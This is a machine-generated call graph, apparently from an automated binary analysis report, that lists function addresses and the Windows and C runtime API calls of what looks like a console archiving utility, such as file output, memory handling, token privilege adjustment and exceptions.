3ef23f 5 API calls 41958->41959 41962 3e91c0 41959->41962 41965 3e8e6b 41960->41965 42696 3b302d 41960->42696 41963 3e917e 41961->41963 41964 3e9052 41961->41964 41966 3b1524 2 API calls 41962->41966 42712 3ea37b fputc fputs fputs _CxxThrowException 41963->42712 42702 3ea312 malloc _CxxThrowException __EH_prolog 41964->42702 42146 3e80d3 malloc _CxxThrowException __EH_prolog 41965->42146 41970 3e91cf 41966->41970 41974 3ef23f 5 API calls 41970->41974 41971 3e8e76 41981 3b2f2f 3 API calls 41971->41981 41972 3e905d 41978 3d6b24 free 41972->41978 41975 3e91d7 41974->41975 41976 3b1524 2 API calls 41975->41976 41980 3e91e6 41976->41980 41977 3e9a51 41979 3ea789 _CxxThrowException 41977->41979 41983 3e9087 41978->41983 41985 3e9a59 41979->41985 41992 3b1e0c ctype 2 API calls 41980->41992 41986 3e8ecf 41981->41986 41982 3e9a4c 42743 3ea7a4 30 API calls __aulldiv 41982->42743 41984 3b276e 3 API calls 41983->41984 41988 3e90c0 41984->41988 42744 3b1e40 free 41985->42744 42147 3ea185 malloc _CxxThrowException __EH_prolog 41986->42147 42703 3b2690 41988->42703 41999 3e9351 41992->41999 41995 3e8eda 41998 3b2f2f 3 API calls 41995->41998 41996 3e90e8 42005 3b276e 3 API calls 41996->42005 41997 3e9a64 42745 3b1e40 free 41997->42745 42001 3e8f3d 41998->42001 42003 3b2f2f 3 API calls 41999->42003 42004 3d6b24 free 42001->42004 42002 3e9a94 42746 3b11c2 free __EH_prolog ctype 42002->42746 42017 3e939d 42003->42017 42007 3e8f60 42004->42007 42008 3e9109 42005->42008 42148 3de64c 42007->42148 42707 3ea4c7 21 API calls 2 library calls 42008->42707 42009 3e9aa0 42747 3eac28 free __EH_prolog ctype 42009->42747 42012 3e9aaf 42748 3d0a72 free ctype 42012->42748 42015 3e9143 42708 3d0a72 free ctype 42015->42708 42016 3e9abb 42611 3ead5a 42017->42611 42018 3e8fbe 42021 3e8fd7 42018->42021 42025 3eb5fa ctype 5 API calls 42018->42025 42602 3ea4c7 21 API calls 2 library calls 42021->42602 42022 3e9155 42709 3b1e40 free 42022->42709 42025->42021 42026 3e9160 42710 3b1e40 free 42026->42710 42031 3e900a 42603 3d0a72 free ctype 42031->42603 42033 3e9168 42711 3eae14 5 API calls ctype 42033->42711 42034 3b2d47 2 API calls 42037 3e944d 42034->42037 42035 3e9019 42604 3b1e40 free 42035->42604 42626 3d2fc1 42037->42626 42040 3e9021 42605 3eadc0 5 API calls ctype 42040->42605 42043 3e948d 42632 3d0d11 42043->42632 42046 3e9031 42606 3e8222 42046->42606 42047 3e9486 42714 3ea789 42047->42714 42051 3e9040 42051->41977 42051->41982 42052 3eb5fa ctype 5 API calls 42053 3e94f9 42052->42053 42054 3e9539 42053->42054 42717 3b1fa0 fputc 42053->42717 42055 3e95b5 42054->42055 42720 3b1fa0 fputc 42054->42720 42056 3e95f0 42055->42056 42059 3e95cb fputs 42055->42059 42061 3e962f 42056->42061 42065 3e960a fputs 42056->42065 42066 3e96b0 42056->42066 42063 3b2201 fputs 42059->42063 42060 3e955a 42060->42055 42064 3e956c fputs 42060->42064 42061->42066 42072 3e9668 42061->42072 42073 3e9644 fputs 42061->42073 42062 3e9511 fputs 42718 3b1fa0 fputc 42062->42718 42068 3e95e9 42063->42068 42069 3b2201 fputs 42064->42069 42070 3b2201 fputs 42065->42070 42088 3e9700 42066->42088 42728 3b1fa0 fputc 42066->42728 42723 3b1fa0 fputc 42068->42723 42076 3e9589 42069->42076 42077 3e9628 42070->42077 42071 3e9527 42719 3b1fa0 fputc 42071->42719 42072->42066 42726 3b1fa0 fputc 42072->42726 42074 3b2201 fputs 42073->42074 42078 3e9661 42074->42078 42721 3b1fa0 fputc 42076->42721 42724 3b1fa0 fputc 42077->42724 42085 3e967d 42085->42066 42093 3e968b fputs 42085->42093 42087 3e988a 42736 3b1fa0 fputc 42087->42736 42088->42087 42095 3e973c 42088->42095 42145 3e987b 42088->42145 42089 3e9590 fputs 42090 3e96cd 42090->42088 42092 3e96db fputs 42090->42092 42107 3e9756 fputs 42095->42107 42108 3e977b 42095->42108 42095->42145 42738 3d302f free ctype 42145->42738 42146->41971 42147->41995 42150 3de656 __EH_prolog 42148->42150 42249 3de69f 42150->42249 42749 3b4e6c 42150->42749 42153 3de6e8 42756 3b4e21 8 API calls 42153->42756 42155 3de6f0 42156 3b2d47 2 API calls 42155->42156 42160 3de839 42155->42160 42155->42249 42157 3de717 42156->42157 42158 3b2d47 2 API calls 42157->42158 42162 3de725 42158->42162 42159 3de876 42159->42249 42757 3de1a3 5 API calls 2 library calls 42159->42757 42160->42159 42779 3de30f malloc _CxxThrowException free CharUpperW 42160->42779 42165 3b302d 3 API calls 42162->42165 42164 3de892 42168 3de8d2 42164->42168 42781 3de223 5 API calls 2 library calls 42164->42781 42167 3de738 42165->42167 42166 3de865 42166->42249 42780 3de37a 4 API calls 2 library calls 42166->42780 42170 3ef23f 5 API calls 42167->42170 42169 3de900 42168->42169 42173 3de8e5 _CxxThrowException 42168->42173 42174 3dec3e 42168->42174 42180 3b2d47 2 API calls 42169->42180 42175 3de742 42170->42175 42173->42169 42182 3dec75 42174->42182 42805 3b2dcd 42174->42805 42767 3c2772 malloc _CxxThrowException __EH_prolog ctype 42175->42767 42176 3de8aa 42178 3b2f2f 3 API calls 42176->42178 42181 3de8b7 42178->42181 42179 3de750 42184 3de758 42179->42184 42200 3de772 42179->42200 42185 3de916 42180->42185 42782 3b1e40 free 42181->42782 42190 3dec7b 42182->42190 42758 3cee23 42182->42758 42768 3b2711 malloc _CxxThrowException free ctype 42184->42768 42189 3b695d 30 API calls 42185->42189 42195 3de92a 42189->42195 42906 3b1e40 free 42190->42906 42192 3de8c3 42783 3b3164 malloc _CxxThrowException free _CxxThrowException 42192->42783 42194 3de768 42775 3b1e40 free 42194->42775 42199 3de92e 42195->42199 42219 3de970 42195->42219 42198 3dec66 42810 3b1e40 free 42198->42810 42207 3de94e 42199->42207 42208 3de933 _CxxThrowException 42199->42208 42201 3de7e0 42200->42201 42769 3b5500 4 API calls 2 library calls 42200->42769 42222 3de81f 42201->42222 42773 3b6f7c 30 API calls 2 library calls 42201->42773 42205 3de97d 42785 3de08a malloc _CxxThrowException free memcpy _CxxThrowException 42205->42785 42375 3dec1c 42207->42375 42784 3de37a 4 API calls 2 library calls 42207->42784 42208->42207 42211 3deccc 42215 3decdd 42211->42215 42275 3ded7d 42211->42275 42212 3de80d 42776 3b1e40 free 42212->42776 42213 3de7ee 42213->42222 42223 3de7f2 42213->42223 42214 3de79a 42224 3b2cec 2 API calls 42214->42224 42811 3d2f93 malloc _CxxThrowException 42215->42811 42219->42205 42220 3de9c9 42219->42220 42301 3de98f 42219->42301 42232 3de9d2 42220->42232 42246 3de9fa 42220->42246 42777 3b1e40 free 42222->42777 42774 3de04a 6 API calls 42223->42774 42231 3de7a9 42224->42231 42225 3dece8 42226 3b2d47 2 API calls 42230 3de963 42237 3de96b 42230->42237 42230->42375 42770 3b1e40 free 42231->42770 42239 3ef23f 5 API calls 42232->42239 42235 3de82e 42778 3b1e40 free 42235->42778 42236 3deb2a 42795 3b1e40 free 42236->42795 42800 3b1e40 free 42237->42800 42244 3de9df 42239->42244 42243 3de7b8 42771 3b6f7c 30 API calls 2 library calls 42243->42771 42252 3b1524 2 API calls 42244->42252 42247 3dea14 42246->42247 42255 3ef23f 5 API calls 42246->42255 42787 3d16ed 42247->42787 42249->42018 42253 3de9ea 42252->42253 42786 3b2711 malloc _CxxThrowException free ctype 42253->42786 42255->42247 42257 3de7c1 42262 3de7d0 42257->42262 42267 3b2f2f 3 API calls 42257->42267 42258 3debe6 42801 3b1e40 free 42258->42801 42772 3b1e40 free 42262->42772 42266 3b2f2f 3 API calls 42309 3dea7e 42266->42309 42267->42262 42276 3dedf0 42275->42276 42277 3b2d47 2 API calls 42275->42277 42458 3ded78 42275->42458 42904 3d0c01 free ctype 42276->42904 42283 3dee38 42277->42283 42281 3dea8f 42792 3b1e40 free 42281->42792 42815 3cf237 42283->42815 42291 3deb09 42794 3b1e40 free 42301->42794 42309->42281 42326 3deb38 42309->42326 42327 3deae8 42309->42327 42336 3deb8d 42326->42336 42337 3deb7b 42326->42337 42791 3b2711 malloc _CxxThrowException free ctype 42327->42791 42344 3dec09 42336->42344 42797 3de37a 4 API calls 2 library calls 42336->42797 42796 3b2711 malloc _CxxThrowException free ctype 42337->42796 42802 3b1e40 free 42344->42802 42352 3deb8b 42804 3b1e40 free 42375->42804 42458->42226 42602->42031 42603->42035 42604->42040 42605->42046 43203 3b1e40 free 42606->43203 42608 3e8236 43204 3eb561 42608->43204 42612 3b2f2f 3 API calls 42611->42612 42613 3eada1 42612->42613 42614 3b2f2f 3 API calls 42613->42614 42615 3e9405 42614->42615 42616 3c2625 42615->42616 42617 3c2637 42616->42617 42621 3c2633 42616->42621 43234 3c27d5 free ctype 42617->43234 42619 3c263e 42620 3c266b 42619->42620 42622 3c264e _CxxThrowException 42619->42622 42623 3c2663 42619->42623 42620->42621 43236 3c2772 malloc _CxxThrowException __EH_prolog ctype 42620->43236 42621->42034 42622->42623 43235 3d0c7f malloc _CxxThrowException free memcpy ctype 42623->43235 42627 3d2fcb __EH_prolog 42626->42627 42628 3b2d47 2 API calls 42627->42628 42629 3d2fe9 42628->42629 42630 3b2d47 2 API calls 42629->42630 42631 3d2ff5 42630->42631 42631->42043 42713 3d23c0 15 API calls 2 library calls 42631->42713 42642 3d0d1b __EH_prolog 42632->42642 42633 3d0e6b 42634 3d0e84 42633->42634 42637 3b1e0c ctype 2 API calls 42633->42637 42635 3b1e0c ctype 2 API calls 42634->42635 42638 3d0eb0 42635->42638 42636 3b2d47 2 API calls 42636->42642 42637->42634 42667 3d0ec3 42638->42667 43237 3c2e4c 42638->43237 42640 3b2e5f 2 API calls 42640->42642 42641 3b695d 30 API calls 42641->42642 42642->42633 42642->42636 42642->42640 42642->42641 42643 3d0ec7 42642->42643 42645 3b1e40 free ctype 42642->42645 42647 3d0ecc 42642->42647 43383 3b7253 GetLastError 42643->43383 42645->42642 43384 3b1e40 free 42647->43384 42649 3d0efa 43385 3b1e40 free 42649->43385 42651 3d0fc2 43402 3b1e40 free 42651->43402 42653 3d16d0 43403 3b1e40 free 42653->43403 42654 3b2d47 2 API calls 42654->42667 42655 3d0f02 43386 3b1e40 free 42655->43386 42658 3d0f0a 42658->42052 42658->42053 42659 3b695d 30 API calls 42659->42667 42660 3d15e4 43400 3b7253 GetLastError 42660->43400 42662 3d15e9 43401 3b1e40 free 42662->43401 42663 3d14b1 43391 3b1e40 free 42663->43391 42666 3d16ed 2 API calls 42666->42667 42667->42651 42667->42654 42667->42659 42667->42660 42667->42663 42667->42666 42668 3d14d0 42667->42668 42671 3d1518 42667->42671 42673 3b1e40 free ctype 42667->42673 42678 3b2e5f 2 API calls 42667->42678 42681 3d1561 42667->42681 42685 3b2f2f malloc _CxxThrowException free 42667->42685 42686 3d159c 42667->42686 42694 3b1fa0 fputc 42667->42694 43255 3c33e3 42667->43255 43259 3e4e43 42667->43259 43271 3e5116 42667->43271 43304 3d193f 42667->43304 43387 3c2a22 7 API calls 2 library calls 42667->43387 43388 3b6141 9 API calls 2 library calls 42667->43388 43389 3b8274 malloc _CxxThrowException free _CxxThrowException 42667->43389 43390 3d0cc8 CharUpperW 42667->43390 43392 3b1e40 free 42668->43392 42670 3d14db 43393 3b1e40 free 42670->43393 43394 3b1e40 free 42671->43394 42673->42667 42676 3d1523 43395 3b1e40 free 42676->43395 42678->42667 43396 3b1e40 free 42681->43396 42685->42667 43398 3b1e40 free 42686->43398 42688 3d156c 43397 3b1e40 free 42688->43397 42690 3d15a7 43399 3b1e40 free 42690->43399 42694->42667 42697 3b3040 42696->42697 42697->42697 42698 3b1e0c ctype 2 API calls 42697->42698 42701 3b3060 42697->42701 42699 3b3056 42698->42699 43789 3b1e40 free 42699->43789 42701->41965 42702->41972 42704 3b1e0c ctype 2 API calls 42703->42704 42705 3b269d 42704->42705 42706 3d29d4 82 API calls 2 library calls 42705->42706 42706->41996 42707->42015 42708->42022 42709->42026 42710->42033 42711->42051 42713->42047 42715 3ea7a2 42714->42715 42716 3ea791 _CxxThrowException 42714->42716 42715->42043 42716->42715 42717->42062 42718->42071 42719->42054 42720->42060 42721->42089 42723->42056 42724->42061 42726->42085 42728->42090 42743->41977 42744->41997 42745->42002 42746->42009 42747->42012 42748->42016 42750 3b4e97 42749->42750 42751 3b4e77 42749->42751 42986 3b5293 free ctype 42750->42986 42751->42750 42939 3b4abb 42751->42939 42754 3b4e9f 42755 3d0710 35 API calls 42754->42755 42755->42153 42756->42155 42757->42164 42759 3cee2d __EH_prolog 42758->42759 43036 3c2962 42759->43036 42762 3d2f93 malloc _CxxThrowException 42762->42211 42767->42179 42768->42194 42769->42214 42770->42243 42771->42257 42772->42201 42773->42213 42774->42194 42775->42212 42776->42249 42777->42235 42778->42160 42779->42166 42780->42159 42781->42176 42782->42192 42783->42168 42784->42230 42785->42301 42786->42301 42788 3d16fd 42787->42788 42789 3b2d47 2 API calls 42788->42789 42790 3d171a 42789->42790 42790->42266 42791->42281 42792->42291 42794->42236 42795->42249 42796->42352 42800->42258 42801->42249 42804->42174 42806 3b2de3 42805->42806 42806->42806 42807 3b2ae9 2 API calls 42806->42807 42808 3b2df2 42807->42808 42809 3d6a0b CharUpperW 42808->42809 42809->42198 42810->42182 42811->42225 42906->42249 42940 3b4ac5 __EH_prolog 42939->42940 42941 3b4aeb 42940->42941 42942 3b4ad6 _CxxThrowException 42940->42942 42987 3b433c 42941->42987 42942->42941 42946 3b4b2f 42947 3b2d47 2 API calls 42946->42947 42948 3b4b51 42947->42948 42949 3b4b8c 42948->42949 42951 3b4b79 wcscmp 42948->42951 42950 3b4c5b 42949->42950 43006 3b4d65 wcscmp wcscmp 42949->43006 43010 3b4a10 CharUpperW 42950->43010 42951->42949 42954 3b4c69 42955 3b4c84 42954->42955 43011 3b51d3 5 API calls 2 library calls 42954->43011 42957 3b4cd5 42955->42957 42964 3d6b24 free 42955->42964 43013 3b4f40 42957->43013 42958 3b4bd0 wcscmp 42960 3b4ba9 42958->42960 42961 3b4be6 wcscmp 42958->42961 42959 3b4c7d 42962 3b2f2f 3 API calls 42959->42962 42960->42958 42969 3b4c01 42960->42969 42961->42960 42962->42955 42967 3b4ca9 42964->42967 42970 3b2dcd 2 API calls 42967->42970 42969->42950 43007 3b3128 malloc _CxxThrowException free _CxxThrowException 42969->43007 43008 3b1089 malloc _CxxThrowException free _CxxThrowException 42969->43008 43009 3b50a5 free memmove ctype 42969->43009 42973 3b4cb6 42970->42973 42971 3b4d33 43024 3d0a72 free ctype 42971->43024 42974 3ef23f 5 API calls 42973->42974 42976 3b4cc4 42974->42976 42979 3b1524 2 API calls 42976->42979 42977 3b4d3f 43025 3b1e40 free 42977->43025 42981 3b4ccd 42979->42981 43012 3b1e40 free 42981->43012 42982 3b4d47 43026 3d0a72 free ctype 42982->43026 42985 3b4d54 42985->42751 42986->42754 42988 3b4346 __EH_prolog 42987->42988 42989 3d6b24 free 42988->42989 42990 3b4358 42989->42990 42991 3b2d47 2 API calls 42990->42991 43004 3b43de 42990->43004 42992 3b4369 42991->42992 42993 3b43b1 42992->42993 42999 3ef23f 5 API calls 42992->42999 43002 3b1524 2 API calls 42992->43002 43027 3b2f87 42992->43027 42994 3b2f87 3 API calls 42993->42994 42995 3b43c2 42994->42995 42997 3ef23f 5 API calls 42995->42997 42998 3b43ca 42997->42998 43000 3b1524 2 API calls 42998->43000 42999->42992 43001 3b43d6 43000->43001 43033 3b1e40 free 43001->43033 43002->42992 43004->42946 43005 3b507f free ctype 43004->43005 43005->42946 43006->42960 43007->42969 43008->42969 43009->42969 43010->42954 43011->42959 43012->42957 43014 3b4d04 43013->43014 43015 3b4f52 43013->43015 43023 3b470c 7 API calls 43014->43023 43016 3d6b24 free 43015->43016 43017 3b4f59 43016->43017 43018 3b4f69 _CxxThrowException 43017->43018 43019 3b4f7e 43017->43019 43022 3b4f86 43017->43022 43018->43019 43035 3d0c7f malloc _CxxThrowException free memcpy ctype 43019->43035 43021 3b1524 2 API calls 43021->43022 43022->43014 43022->43021 43023->42971 43024->42977 43025->42982 43026->42985 43028 3b2f95 43027->43028 43030 3b2fa8 43027->43030 43029 3b1e0c ctype 2 API calls 43028->43029 43031 3b2f9f 43029->43031 43030->42992 43034 3b1e40 free 43031->43034 43033->43004 43034->43030 43035->43022 43047 41f1b0 43036->43047 43038 3c296c GetCurrentProcess 43048 3c2a00 43038->43048 43040 3c2989 OpenProcessToken 43041 3c29df 43040->43041 43042 3c299a LookupPrivilegeValueW 43040->43042 43044 3c2a00 FindCloseChangeNotification 43041->43044 43042->43041 43043 3c29bc AdjustTokenPrivileges 43042->43043 43043->43041 43045 3c29d1 GetLastError 43043->43045 43046 3c29eb 43044->43046 43045->43041 43046->42762 43047->43038 43049 3c2a0d FindCloseChangeNotification 43048->43049 43050 3c2a09 43048->43050 43051 3c2a1d 43049->43051 43050->43040 43051->43040 43203->42608 43205 3eb56b __EH_prolog 43204->43205 43206 3eb5fa ctype 5 API calls 43205->43206 43207 3eb580 43206->43207 43222 3b1e40 free 43207->43222 43209 3eb58b 43223 3e820b 43209->43223 43213 3eb5a0 43229 3b1e40 free 43213->43229 43215 3eb5a8 43230 3b1e40 free 43215->43230 43217 3eb5b0 43222->43209 43232 3b1e40 free 43223->43232 43225 3e8216 43233 3b1e40 free 43225->43233 43227 3e821e 43228 3b1e40 free 43227->43228 43228->43213 43229->43215 43230->43217 43232->43225 43233->43227 43234->42619 43235->42620 43236->42620 43238 3c2e56 __EH_prolog 43237->43238 43239 3b2d47 2 API calls 43238->43239 43240 3c2ec0 43239->43240 43241 3b2d47 2 API calls 43240->43241 43242 3c2ecc 43241->43242 43404 3c3007 43242->43404 43256 3c33fa 43255->43256 43257 3c33f4 43255->43257 43256->42667 43412 3b1e40 free 43257->43412 43260 3e4e4f 43259->43260 43261 3e4af9 5 API calls 43260->43261 43264 3e4ee9 43260->43264 43262 3e4e8a 43261->43262 43263 3e4ed3 43262->43263 43413 3b1fa0 fputc 43262->43413 43263->43264 43427 3b2711 malloc _CxxThrowException free ctype 43263->43427 43264->42667 43267 3e4ead fputs 43414 3b211a 43267->43414 43272 3e5120 __EH_prolog 43271->43272 43273 3e513c 43272->43273 43275 3eb5fa ctype 5 API calls 43272->43275 43430 3e480a 43273->43430 43275->43273 43276 3e53b0 43295 3e53dc 43276->43295 43434 3e6e12 43276->43434 43277 3e53e1 43279 3e540e fputs 43277->43279 43277->43295 43281 3b211a 6 API calls 43279->43281 43284 3e4ef1 8 API calls 43298 3e5163 43284->43298 43285 3e520f fputs 43458 3b1fa0 fputc 43285->43458 43289 3b210c 6 API calls 43289->43298 43291 3e53a9 43291->43276 43291->43277 43293 3e52f7 fputs 43459 3b1fa0 fputc 43293->43459 43295->42667 43298->43284 43298->43285 43298->43289 43298->43291 43298->43293 43300 3b1fa0 fputc 43298->43300 43460 3e5001 10 API calls 2 library calls 43298->43460 43300->43298 43305 3d1949 __EH_prolog 43304->43305 43306 3b2e5f 2 API calls 43305->43306 43307 3d1999 43306->43307 43308 3b2e5f 2 API calls 43307->43308 43310 3d19ac 43308->43310 43309 3d19e9 43311 3b2dcd 2 API calls 43309->43311 43310->43309 43313 3b2f2f 3 API calls 43310->43313 43312 3d1a07 43311->43312 43577 3b341a 43312->43577 43313->43309 43383->42647 43384->42649 43385->42655 43386->42658 43387->42667 43388->42667 43389->42667 43390->42667 43391->42651 43392->42670 43393->42651 43394->42676 43395->42651 43396->42688 43397->42651 43398->42690 43399->42651 43400->42662 43401->42651 43402->42653 43403->42658 43405 3c3011 __EH_prolog 43404->43405 43406 3b2d47 2 API calls 43405->43406 43407 3c301e 43406->43407 43408 3b2d47 2 API calls 43407->43408 43412->43256 43413->43267 43415 3b2124 __EH_prolog 43414->43415 43416 3b2d8a 2 API calls 43415->43416 43417 3b2135 43416->43417 43427->43264 43431 3e4816 43430->43431 43432 3e4820 43430->43432 43433 3eb5fa ctype 5 API calls 43431->43433 43432->43298 43433->43432 43447 3e6e1c __EH_prolog 43434->43447 43458->43298 43459->43298 43460->43298 43789->42701 43790 3e9aea 43791 3e9b08 43790->43791 43792 3e9af7 43790->43792 43792->43791 43796 3e9b0f 43792->43796 43800 3eaecf __EH_prolog 43796->43800 43797 3eaf09 43804 3b1e40 free 43797->43804 43799 3e9b02 43802 3b1e40 free 43799->43802 43800->43797 43803 3b1e40 free 43800->43803 43802->43791 43803->43800 43804->43799 43805 40b496 43806 40b49a 43805->43806 43807 40b49d 43805->43807 43807->43806 43808 40b4a1 malloc 43807->43808 43808->43806 43809 3ca8a6 43810 3ca8b0 __EH_prolog 43809->43810 43946 3ca8c7 43810->43946 43947 3b97c7 GetCurrentProcess GetProcessAffinityMask 43810->43947 43812 3ca8fd 43813 3b9809 3 API calls 43812->43813 43814 3ca930 43813->43814 43948 3ccbdd malloc _CxxThrowException __EH_prolog 43814->43948 43816 3cad33 43818 3b2690 2 API calls 43816->43818 43849 3caff3 __aulldiv 43816->43849 43817 3b2e5f 2 API calls 43875 3caa34 43817->43875 43819 3cafcb 43818->43819 43955 3ba06d 6 API calls 2 library calls 43819->43955 43821 3cafd7 43956 3b1e40 free 43821->43956 43823 3b1e40 free ctype 43833 3ca98f 43823->43833 43824 3caf6b 43997 3b1e40 free 43824->43997 43826 3cb501 43939 3cb480 43826->43939 43962 3b26ec malloc _CxxThrowException 43826->43962 43829 3cb487 43829->43826 43829->43939 43961 3b1e40 free 43829->43961 43830 3caf91 43953 3b7253 GetLastError 43830->43953 43833->43823 43833->43875 43835 3caf72 43840 3b7322 FindCloseChangeNotification 43835->43840 43836 3cb57a 43838 3cb598 43836->43838 43963 3b2711 malloc _CxxThrowException free ctype 43836->43963 43846 3cb619 43838->43846 43851 3cb59d 43838->43851 43840->43824 43843 3ca0a8 memset strlen 43843->43875 43844 3b92c9 VariantClear 43844->43824 43856 3cb63d 43846->43856 43965 3b2711 malloc _CxxThrowException free ctype 43846->43965 43847 3b92c9 VariantClear 43847->43875 43853 3cb296 __aulldiv 43849->43853 43849->43939 43957 3ca0a8 memset strlen 43849->43957 43850 3b1e40 free ctype 43850->43875 43851->43824 43964 3ccc1e 25 API calls 2 library calls 43851->43964 43853->43826 43853->43829 43853->43939 43958 3ca39f 11 API calls 3 library calls 43853->43958 43959 3ca27c memset strlen 43853->43959 43960 3ca0a8 memset strlen 43853->43960 43854 3b7322 FindCloseChangeNotification 43854->43875 43858 3cb6b2 43856->43858 43862 3cc159 43856->43862 43941 3cb6e2 43858->43941 43966 3b2711 malloc _CxxThrowException free ctype 43858->43966 43860 3b2d47 malloc _CxxThrowException 43860->43875 43861 3cc1e9 43864 3cc20a 43861->43864 43865 3cc2db 43861->43865 43862->43824 43862->43861 43972 3ce997 free memmove ctype 43862->43972 43871 3b2690 2 API calls 43864->43871 43879 3b1e40 free ctype 43864->43879 43881 3cc2c4 43864->43881 43893 3cc2bf 43864->43893 43973 3b26b2 malloc _CxxThrowException 43864->43973 43974 3b2711 malloc _CxxThrowException free ctype 43864->43974 43869 3b2690 2 API calls 43865->43869 43878 3b1e40 free ctype 43865->43878 43882 3cc38f 43865->43882 43865->43893 43976 3b26b2 malloc _CxxThrowException 43865->43976 43977 3b2711 malloc _CxxThrowException free ctype 43865->43977 43868 3b2d8a 2 API calls 43868->43875 43869->43865 43870 3cafa6 43870->43844 43871->43864 43875->43816 43875->43817 43875->43824 43875->43830 43875->43835 43875->43843 43875->43847 43875->43850 43875->43854 43875->43860 43875->43868 43875->43870 43876 3cafa1 43875->43876 43949 3b7342 GetFileSize GetLastError 43875->43949 43950 3c82e9 VirtualAlloc VirtualFree 43875->43950 43951 3ce76a SysAllocStringLen _CxxThrowException VariantClear 43875->43951 43952 3bd027 4 API calls 2 library calls 43875->43952 43954 3b1e40 free 43876->43954 43878->43865 43879->43864 43975 3b1e40 free 43881->43975 43978 3b1e40 free 43882->43978 43885 3cc2cf 43979 3b1e40 free 43885->43979 43887 3ca10c memset 43887->43941 43888 3cc4ae 43889 3b1e0c ctype 2 API calls 43888->43889 43891 3cc4dc 43889->43891 43890 3ef23f malloc _CxxThrowException free memcpy _CxxThrowException 43890->43893 43892 3b1e0c ctype 2 API calls 43891->43892 43896 3cc4eb 43892->43896 43893->43888 43893->43890 43933 3cc5d6 43896->43933 43980 3ca10c memset 43896->43980 43981 3ca0a8 memset strlen 43896->43981 43897 3cc9d4 43994 3b1e40 free 43897->43994 43899 3ccb08 43995 3b1e40 free 43899->43995 43901 3ccb10 43996 3b1e40 free 43901->43996 43903 3ca115 memset 43903->43941 43904 3cc9db 43984 3b1e40 free 43904->43984 43905 3cca53 __aulldiv 43905->43897 43993 3ce822 memset strlen __aulldiv 43905->43993 43908 3cc9e3 43985 3b1e40 free 43908->43985 43910 3b2690 2 API calls 43910->43941 43912 3ca39f 11 API calls 43912->43941 43913 3cc9eb 43986 3b1e40 free 43913->43986 43915 3cc9f3 43987 3b1e40 free 43915->43987 43918 3cc9fe 43988 40b370 VirtualFree 43918->43988 43919 3b2dcd 2 API calls 43919->43933 43922 3cca09 43927 3b92c9 VariantClear 43922->43927 43923 3cca19 43989 3b1e40 free 43923->43989 43924 3cbd22 strcmp 43924->43941 43925 3b1e40 free ctype 43925->43941 43927->43923 43929 3cca30 43990 3b1e40 free 43929->43990 43930 3b92c9 VariantClear 43930->43933 43933->43897 43933->43904 43933->43905 43933->43919 43933->43922 43933->43923 43933->43930 43938 3ce822 memset strlen 43933->43938 43982 3b1e40 free 43933->43982 43983 3ccc1e 25 API calls 2 library calls 43933->43983 43934 3cca38 43991 3b1e40 free 43934->43991 43936 3cca40 43992 3b1e40 free 43936->43992 43938->43933 43998 40b370 VirtualFree 43939->43998 43940 3b2dcd 2 API calls 43940->43941 43941->43824 43941->43887 43941->43903 43941->43910 43941->43912 43941->43924 43941->43925 43941->43940 43943 3cc10f 43941->43943 43944 3b92c9 VariantClear 43941->43944 43941->43946 43967 3ca0a8 memset strlen 43941->43967 43968 3ce622 8 API calls 2 library calls 43941->43968 43969 3b26b2 malloc _CxxThrowException 43941->43969 43970 3b2711 malloc _CxxThrowException free ctype 43941->43970 43971 3ccc1e 25 API calls 2 library calls 43941->43971 43945 3b92c9 VariantClear 43943->43945 43944->43941 43945->43946 43947->43812 43948->43833 43949->43875 43950->43875 43951->43875 43952->43875 43953->43835 43954->43870 43955->43821 43956->43849 43957->43849 43958->43853 43959->43853 43960->43853 43961->43826 43962->43836 43963->43838 43964->43824 43965->43856 43966->43941 43967->43941 43968->43941 43969->43941 43970->43941 43971->43941 43972->43862 43973->43864 43974->43864 43975->43885 43976->43865 43977->43865 43978->43885 43979->43893 43980->43896 43981->43896 43982->43933 43983->43933 43984->43908 43985->43913 43986->43915 43987->43918 43988->43922 43989->43929 43990->43934 43991->43936 43992->43939 43993->43905 43994->43899 43995->43901 43996->43824 43997->43939 43998->43946 43999 3dc71d 44029 3dc89c 43999->44029 44001 3dc724 44002 3b2d47 2 API calls 44001->44002 44003 3dc750 44002->44003 44004 3b2d47 2 API calls 44003->44004 44005 3dc75c 44004->44005 44007 3dc7bc 44005->44007 44037 3b60ef 44005->44037 44010 3dc7e4 44007->44010 44027 3dc80b 44007->44027 44062 3b1e40 free 44010->44062 44013 3dc794 44060 3b1e40 free 44013->44060 44014 3dc869 44065 3b1e40 free 44014->44065 44015 3dc7ec 44063 3b1e40 free 44015->44063 44018 3b2cec 2 API calls 44018->44027 44020 3dc79c 44061 3b1e40 free 44020->44061 44021 3dc871 44066 3b1e40 free 44021->44066 44024 3ef23f 5 API calls 44024->44027 44025 3dc7a4 44026 3b1524 2 API calls 44026->44027 44027->44014 44027->44018 44027->44024 44027->44026 44064 3b1e40 free 44027->44064 44030 3dc8a6 __EH_prolog 44029->44030 44031 3b2d47 2 API calls 44030->44031 44032 3dc908 44031->44032 44033 3b2d47 2 API calls 44032->44033 44034 3dc914 44033->44034 44035 3b2d47 2 API calls 44034->44035 44036 3dc92a 44035->44036 44036->44001 44038 3b600a 9 API calls 44037->44038 44039 3b60ff 44038->44039 44040 3b610e 44039->44040 44041 3b2ecb 3 API calls 44039->44041 44042 3b2ecb 3 API calls 44040->44042 44041->44040 44043 3b6128 44042->44043 44044 3c6a27 44043->44044 44045 3c6a31 __EH_prolog 44044->44045 44067 3c6d46 44045->44067 44048 3d6b24 free 44049 3c6a4c 44048->44049 44050 3b2f2f 3 API calls 44049->44050 44051 3c6a67 44050->44051 44052 3b2cec 2 API calls 44051->44052 44053 3c6a74 44052->44053 44054 3b695d 30 API calls 44053->44054 44055 3c6a84 44054->44055 44072 3b1e40 free 44055->44072 44057 3c6a98 44058 3c6aa5 44057->44058 44073 3b7253 GetLastError 44057->44073 44058->44007 44058->44013 44060->44020 44061->44025 44062->44015 44063->44025 44064->44027 44065->44021 44066->44025 44070 3c74d3 44067->44070 44069 3c6a44 44069->44048 44070->44069 44074 3c73d1 free ctype 44070->44074 44075 3b1e40 free 44070->44075 44072->44057 44073->44058 44074->44070 44075->44070 44076 40b320 free 44078 417e20 WaitForSingleObject 44079 417e41 44078->44079 44080 417e3b GetLastError 44078->44080 44081 417e4e FindCloseChangeNotification 44079->44081 44083 417e5f 44079->44083 44080->44079 44082 417e59 GetLastError 44081->44082 44081->44083 44082->44083 44084 3badd9 44085 3bade6 44084->44085 44086 3badf7 44084->44086 44085->44086 44090 3badfe 44085->44090 44091 3bae08 __EH_prolog 44090->44091 44097 40b370 VirtualFree 44091->44097 44093 3bae3d 44094 3b7322 FindCloseChangeNotification 